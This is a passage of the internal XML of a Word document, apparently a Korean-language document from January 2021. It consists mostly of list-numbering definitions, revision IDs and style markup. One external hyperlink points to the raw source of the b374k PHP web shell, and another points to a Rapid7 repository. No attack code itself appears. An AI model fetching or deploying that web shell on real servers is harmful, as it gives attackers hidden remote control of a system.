    <w:lvl w:ilvl="0" w:tplc="0D04A3D6">
      <w:start w:val="3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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="463A6BAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D187492"/>
    <w:lvl w:ilvl="0" w:tplc="4EE87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66B44CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D187492"/>
    <w:lvl w:ilvl="0" w:tplc="4EE87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33D123C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EC083BA"/>
    <w:lvl w:ilvl="0" w:tplc="26E0E12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43C5C52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C630C712"/>
    <w:lvl w:ilvl="0" w:tplc="59663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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B1A4356"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29261D92"/>
    <w:lvl w:ilvl="0" w:tplc="5E2C4AD4">
      <w:start w:val="4"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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7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EE11BB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA685328"/>
    <w:lvl w:ilvl="0" w:tplc="2E7EF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62B74B89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97BC9810"/>
    <w:lvl w:ilvl="0" w:tplc="53D80D46">
      <w:start w:val="3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70A416CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62A009F8"/>
    <w:lvl w:ilvl="0" w:tplc="885A88D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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="726425B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="051A295C"/>
    <w:lvl w:ilvl="0" w:tplc="D6620E6E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C92DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDF8FB64"/>
    <w:lvl w:ilvl="0" w:tplc="595ECCE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BB9E2D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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4DA300C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09BCDCC0"/>
    <w:lvl w:ilvl="0" w:tplc="3F46BB9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8"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="1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25C1B"/>
    <w:rsid w:val="0004419D"/>
    <w:rsid w:val="00052489"/>
    <w:rsid w:val="00065EEB"/>
    <w:rsid w:val="000A6A41"/>
    <w:rsid w:val="000C0D36"/>
    <w:rsid w:val="000D511C"/>
    <w:rsid w:val="000D6EBD"/>
    <w:rsid w:val="000E54A6"/>
    <w:rsid w:val="00100D55"/>
    <w:rsid w:val="001072CD"/>
    <w:rsid w:val="00135ACB"/>
    <w:rsid w:val="00152A4C"/>
    <w:rsid w:val="0016435C"/>
    <w:rsid w:val="0016436D"/>
    <w:rsid w:val="00194478"/>
    <w:rsid w:val="001A5871"/>
    <w:rsid w:val="001A673E"/>
    <w:rsid w:val="001F0BA1"/>
    <w:rsid w:val="001F4962"/>
    <w:rsid w:val="002044FF"/>
    <w:rsid w:val="00221557"/>
    <w:rsid w:val="0025501D"/>
    <w:rsid w:val="002625EC"/>
    <w:rsid w:val="002631E4"/>
    <w:rsid w:val="0028607F"/>
    <w:rsid w:val="002D35C4"/>
    <w:rsid w:val="002D5F30"/>
    <w:rsid w:val="002F2FBD"/>
    <w:rsid w:val="00304459"/>
    <w:rsid w:val="0034556D"/>
    <w:rsid w:val="0037104B"/>
    <w:rsid w:val="00374687"/>
    <w:rsid w:val="00377BF4"/>
    <w:rsid w:val="00382A60"/>
    <w:rsid w:val="00386079"/>
    <w:rsid w:val="003955C1"/>
    <w:rsid w:val="003C14C9"/>
    <w:rsid w:val="003D753D"/>
    <w:rsid w:val="003E0143"/>
    <w:rsid w:val="003F4A1F"/>
    <w:rsid w:val="00400BA8"/>
    <w:rsid w:val="004017AB"/>
    <w:rsid w:val="00416593"/>
    <w:rsid w:val="00435F8A"/>
    <w:rsid w:val="0044016F"/>
    <w:rsid w:val="004A6E64"/>
    <w:rsid w:val="004C1C10"/>
    <w:rsid w:val="004C2099"/>
    <w:rsid w:val="004C4F46"/>
    <w:rsid w:val="004C742C"/>
    <w:rsid w:val="004D094A"/>
    <w:rsid w:val="004E35AC"/>
    <w:rsid w:val="0050432B"/>
    <w:rsid w:val="0050741D"/>
    <w:rsid w:val="00511F69"/>
    <w:rsid w:val="00526DD4"/>
    <w:rsid w:val="005351E1"/>
    <w:rsid w:val="00536FF1"/>
    <w:rsid w:val="00576B37"/>
    <w:rsid w:val="0058148E"/>
    <w:rsid w:val="005A0FA9"/>
    <w:rsid w:val="005C6508"/>
    <w:rsid w:val="005E13EB"/>
    <w:rsid w:val="005E603B"/>
    <w:rsid w:val="0062040D"/>
    <w:rsid w:val="00637AED"/>
    <w:rsid w:val="00663A45"/>
    <w:rsid w:val="00663B5B"/>
    <w:rsid w:val="00695C89"/>
    <w:rsid w:val="006A65DB"/>
    <w:rsid w:val="006F2E6D"/>
    <w:rsid w:val="00730FAC"/>
    <w:rsid w:val="00735B05"/>
    <w:rsid w:val="00740769"/>
    <w:rsid w:val="00755E32"/>
    <w:rsid w:val="0077094C"/>
    <w:rsid w:val="0077795D"/>
    <w:rsid w:val="00796E71"/>
    <w:rsid w:val="007C11B9"/>
    <w:rsid w:val="007C6147"/>
    <w:rsid w:val="007D4199"/>
    <w:rsid w:val="007F222F"/>
    <w:rsid w:val="007F2AA2"/>
    <w:rsid w:val="007F6510"/>
    <w:rsid w:val="00810D7F"/>
    <w:rsid w:val="008112DB"/>
    <w:rsid w:val="008272E7"/>
    <w:rsid w:val="008335CD"/>
    <w:rsid w:val="00860EA6"/>
    <w:rsid w:val="0086277C"/>
    <w:rsid w:val="0086484A"/>
    <w:rsid w:val="00867810"/>
    <w:rsid w:val="00881308"/>
    <w:rsid w:val="008868CF"/>
    <w:rsid w:val="008B2F50"/>
    <w:rsid w:val="008E68CE"/>
    <w:rsid w:val="009321EF"/>
    <w:rsid w:val="00943F7D"/>
    <w:rsid w:val="00952E43"/>
    <w:rsid w:val="00977B7F"/>
    <w:rsid w:val="009F50D9"/>
    <w:rsid w:val="00A068FB"/>
    <w:rsid w:val="00A21FC0"/>
    <w:rsid w:val="00A24049"/>
    <w:rsid w:val="00A51ABA"/>
    <w:rsid w:val="00A52EA8"/>
    <w:rsid w:val="00A60087"/>
    <w:rsid w:val="00A61565"/>
    <w:rsid w:val="00A75376"/>
    <w:rsid w:val="00A8495D"/>
    <w:rsid w:val="00A906F7"/>
    <w:rsid w:val="00AE7893"/>
    <w:rsid w:val="00B011A0"/>
    <w:rsid w:val="00B24BB3"/>
    <w:rsid w:val="00B30B35"/>
    <w:rsid w:val="00B60A60"/>
    <w:rsid w:val="00B67587"/>
    <w:rsid w:val="00B75F57"/>
    <w:rsid w:val="00B7649D"/>
    <w:rsid w:val="00B779A6"/>
    <w:rsid w:val="00B81204"/>
    <w:rsid w:val="00B8468F"/>
    <w:rsid w:val="00B9373F"/>
    <w:rsid w:val="00BA400A"/>
    <w:rsid w:val="00BC3275"/>
    <w:rsid w:val="00BD2937"/>
    <w:rsid w:val="00BE7966"/>
    <w:rsid w:val="00BF24B9"/>
    <w:rsid w:val="00C047CC"/>
    <w:rsid w:val="00C065AD"/>
    <w:rsid w:val="00C37A15"/>
    <w:rsid w:val="00C526C5"/>
    <w:rsid w:val="00C61ABA"/>
    <w:rsid w:val="00C75C0A"/>
    <w:rsid w:val="00CA235D"/>
    <w:rsid w:val="00CB1D8E"/>
    <w:rsid w:val="00CC3B11"/>
    <w:rsid w:val="00CD5594"/>
    <w:rsid w:val="00CD7784"/>
    <w:rsid w:val="00D15AAC"/>
    <w:rsid w:val="00D1788F"/>
    <w:rsid w:val="00D34610"/>
    <w:rsid w:val="00D3530D"/>
    <w:rsid w:val="00D35598"/>
    <w:rsid w:val="00D46589"/>
    <w:rsid w:val="00D77909"/>
    <w:rsid w:val="00D83289"/>
    <w:rsid w:val="00DA12CE"/>
    <w:rsid w:val="00DA2AA2"/>
    <w:rsid w:val="00DA2D7E"/>
    <w:rsid w:val="00DD0F9B"/>
    <w:rsid w:val="00DD2FD4"/>
    <w:rsid w:val="00DD3935"/>
    <w:rsid w:val="00DE047E"/>
    <w:rsid w:val="00DF1BF8"/>
    <w:rsid w:val="00E10849"/>
    <w:rsid w:val="00EA025D"/>
    <w:rsid w:val="00ED2787"/>
    <w:rsid w:val="00EF1860"/>
    <w:rsid w:val="00F21CD1"/>
    <w:rsid w:val="00F667CD"/>
    <w:rsid w:val="00F70868"/>
    <w:rsid w:val="00F8104B"/>
    <w:rsid w:val="00F91FA0"/>
    <w:rsid w:val="00FA36C7"/>
    <w:rsid w:val="00FA6099"/>
    <w:rsid w:val="00FA642A"/>
    <w:rsid w:val="00FA66E1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DF724"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F6DEAD39-F946-49D2-843A-BE54E817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table" w:styleId="a8">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="003455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9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E54A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E54A6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="1">
    <w:name w:val="표 구분선1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00194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8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9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46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aw.githubusercontent.com/tennc/webshell/master/php/b374k/b374k-3.2.2.php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raw.githubusercontent.com/rapid7/" TargetMode="External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362-99A4-4BA5-BFF9-232A357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3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shin</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-12T07:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-15T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>